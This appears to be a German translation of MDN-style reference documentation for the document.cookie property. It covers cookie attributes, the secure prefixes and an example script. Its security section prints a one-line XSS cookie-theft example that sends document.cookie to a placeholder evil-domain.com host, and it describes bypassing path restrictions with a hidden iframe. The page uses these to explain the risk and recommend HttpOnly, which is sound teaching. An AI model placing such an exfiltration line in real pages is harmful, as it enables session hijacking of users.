Dokument: Cookie-Eigenschaft

allCookies = document.cookie;

Im obigen Code ist allCookies ein String, der eine durch Semikolons getrennte Liste aller Cookies enthält (d.h. key=value Paare). Beachten Sie, dass sowohl key als auch value von Leerzeichen (Leer- und Tabulatorzeichen) umgeben sein können: Tatsächlich verlangt RFC 6265 ein Leerzeichen nach jedem Semikolon, aber einige User Agents halten sich möglicherweise nicht daran.

document.cookie = newCookie;

Im obigen Code ist newCookie ein String der Form key=value, der das zu setzende/aktualisierende Cookie angibt. Beachten Sie, dass Sie mit dieser Methode nur ein Cookie gleichzeitig setzen/aktualisieren können. Bedenken Sie auch, dass:

• Beliebige der folgenden Cookie-Attributwerte optional dem Schlüssel-Wert-Paar folgen können, jeweils durch ein Semikolon getrennt:

  • ;domain=domain (z.B. example.com oder subdomain.example.com): Der Host, an den das Cookie gesendet wird. Wenn nicht angegeben, wird dies standardmäßig auf den Hostteil des aktuellen Dokumentstandorts gesetzt, und das Cookie ist auf Subdomains nicht verfügbar. Wird eine Domain angegeben, sind Subdomains immer enthalten. Im Gegensatz zu früheren Spezifikationen werden führende Punkte in Domainnamen ignoriert, aber Browser können ablehnen, das Cookie mit solchen Punkten zu setzen.

    Hinweis: Die Domain muss mit der Domain des JavaScript-Ursprungs übereinstimmen. Das Setzen von Cookies auf fremde Domains wird stillschweigend ignoriert.

  • ;expires=date-in-UTCString-format: Das Ablaufdatum des Cookies. Wenn weder expires noch max-age angegeben sind, verfällt es am Ende der Sitzung.

    Warnung: Wenn der Datenschutz der Benutzer ein Anliegen ist, ist es wichtig, dass jede Web-App-Implementierung Cookie-Daten nach einem bestimmten Timeout ungültig macht, anstatt sich auf den Browser zu verlassen. Viele Browser erlauben es Benutzern anzugeben, dass Cookies niemals ablaufen sollen, was nicht unbedingt sicher ist.

    Siehe Date.toUTCString() für Hilfe beim Formatieren dieses Wertes.

  • ;max-age=max-age-in-seconds: Das maximale Alter des Cookies in Sekunden (z.B. 60*60*24*365 oder 31.536.000 für ein Jahr).

  • ;partitioned: Gibt an, dass das Cookie unter Verwendung von partitioniertem Speicher gespeichert werden soll. Siehe Cookies mit unabhängigem partitioniertem Zustand (CHIPS) für weitere Details.

  • ;path=path: Der Wert des Path-Attributs des Cookies (siehe Definieren, wo Cookies gesendet werden für weitere Informationen).

  • ;samesite: Das SameSite-Attribut eines Set-Cookie Headers kann von einem Server gesetzt werden, um anzugeben, wann das Cookie gesendet wird. Mögliche Werte sind lax, strict oder none (siehe auch Steuern von Drittanbieter-Cookies mit SameSite).

    • Der lax-Wert sendet das Cookie für alle Anfragen gleicher Site und top-level Navigations-GET-Anfragen. Dies ist ausreichend für das Benutzer-Tracking, verhindert jedoch viele Cross-Site Request Forgery (CSRF)-Angriffe. Dies ist der Standardwert in modernen Browsern.
    • Der strict-Wert verhindert, dass das Cookie vom Browser an die Zielsite in allen Cross-Site-Browsing-Kontexten gesendet wird, auch wenn ein regulärer Link gefolgt wird.
    • Der none-Wert gibt ausdrücklich an, dass keine Einschränkungen angewendet werden. Das Cookie wird in allen Anfragen gesendet - sowohl übergreifend als auch gleichseitig.

  • ;secure: Gibt an, dass das Cookie nur über ein sicheres Protokoll übertragen werden soll.

• Der Cookie-Wert-String kann encodeURIComponent() verwenden, um sicherzustellen, dass der String keine Kommas, Semikolons oder Leerzeichen enthält (die in Cookie-Werten nicht erlaubt sind).

• Einige User-Agent-Implementierungen unterstützen die folgenden Cookie-Präfixe:

  • __Secure- signalisiert dem Browser, dass er das Cookie nur in über einen sicheren Kanal übertragenen Anfragen einfügen soll.
  • __Host- signalisiert dem Browser, dass zusätzlich zur Einschränkung, das Cookie nur von einem sicheren Ursprung zu verwenden, der Gültigkeitsbereich des Cookies auf ein vom Server übergebenes Pfadattribut beschränkt ist. Wenn der Server das Pfadattribut weglässt, wird das "Verzeichnis" der Anforderungs-URI verwendet. Es signalisiert auch, dass das Domain-Attribut nicht vorhanden sein darf, was verhindert, dass das Cookie an andere Domains gesendet wird. Für Chrome muss das Pfadattribut immer der Ursprung sein.

  Hinweis: Der Bindestrich wird als Teil des Präfixes betrachtet.

  Hinweis: Diese Flags sind nur mit dem secure-Attribut einstellbar.

Um den folgenden Code zu verwenden, ersetzen Sie bitte alle Vorkommen des Wortes doSomethingOnlyOnce (der Name des Cookies) mit einem benutzerdefinierten Namen.

function doOnce() {
  if (
    !document.cookie
      .split("; ")
      .find((row) => row.startsWith("doSomethingOnlyOnce"))
  ) {
    // Note that we are setting `SameSite=None;` in this example because the example
    // needs to work cross-origin.
    // It is more common not to set the `SameSite` attribute, which results in the default,
    // and more secure, value of `SameSite=Lax;`
    document.cookie =
      "doSomethingOnlyOnce=true; expires=Fri, 31 Dec 9999 23:59:59 GMT; SameSite=None; Secure";

    const output = document.getElementById("do-once");
    output.textContent = "> Do something here!";
  }
}

function clearOutputDoOnce() {
  const output = document.getElementById("do-once");
  output.textContent = "";
}

<button onclick="doOnce()">Only do something once</button>

<button onclick="clearOutputDoOnce()">Clear</button>

<div>
  <code id="do-once"></code>
</div>

Es ist wichtig zu beachten, dass das path-Attribut nicht vor unbefugtem Lesen des Cookies von einem anderen Pfad schützt. Es kann leicht durch die DOM-Methoden umgangen werden, zum Beispiel durch Erstellen eines versteckten <iframe>-Elements mit dem Pfad des Cookies und dann den Zugriff auf die contentDocument.cookie-Eigenschaft dieses Iframes. Der einzige Weg, das Cookie zu schützen, besteht darin, eine andere Domain oder Subdomain zu verwenden, aufgrund der Same-Origin-Policy.

Cookies werden oft in Webanwendungen verwendet, um einen Benutzer und seine authentifizierte Sitzung zu identifizieren. Das Stehlen eines Cookies einer Webanwendung führt zur Entführung der authentifizierten Benutzersitzung. Häufige Wege, um Cookies zu stehlen, sind die Verwendung von Social Engineering oder die Ausnutzung einer Cross-Site-Scripting (XSS)-Schwachstelle in der Anwendung -

new Image().src = `http://www.evil-domain.com/steal-cookie.php?cookie=${document.cookie}`;

Das HTTPOnly-Cookie-Attribut kann helfen, diesen Angriff zu mildern, indem es den Zugriff auf den Cookie-Wert durch JavaScript verhindert. Lesen Sie mehr über Cookies und Sicherheit.

• Ab Firefox 2 ist ein besserer Mechanismus für die clientseitige Speicherung verfügbar - WHATWG DOM Storage.
• Sie können ein Cookie löschen, indem Sie seine Ablaufzeit auf null ändern.
• Beachten Sie, dass je mehr Cookies Sie haben, desto mehr Daten zwischen dem Server und dem Client für jede Anfrage übertragen werden. Dies wird jede Anfrage verlangsamen. Es wird dringend empfohlen, WHATWG DOM Storage zu verwenden, wenn Sie "nur-Client"-Daten speichern möchten.
• RFC 2965 (Abschnitt 5.3, "Implementation Limits") spezifiziert, dass es keine maximale Länge der Schlüssel- oder Wertgröße eines Cookies geben sollte und ermutigt Implementierungen, beliebig große Cookies zu unterstützen. Das Maximum der Implementierung jedes Browsers wird notwendigerweise unterschiedlich sein, konsultieren Sie daher die Dokumentation der einzelnen Browser.

Der Grund für die Syntax der document.cookie Accessor-Eigenschaft liegt in der Client-Server-Natur von Cookies, die sich von anderen Client-Client-Speichermethoden unterscheidet (wie z.B. localStorage):

• HTTP-Cookies
• DOM Storage
• URL.pathname
• Date.toUTCString()
• RFC 2965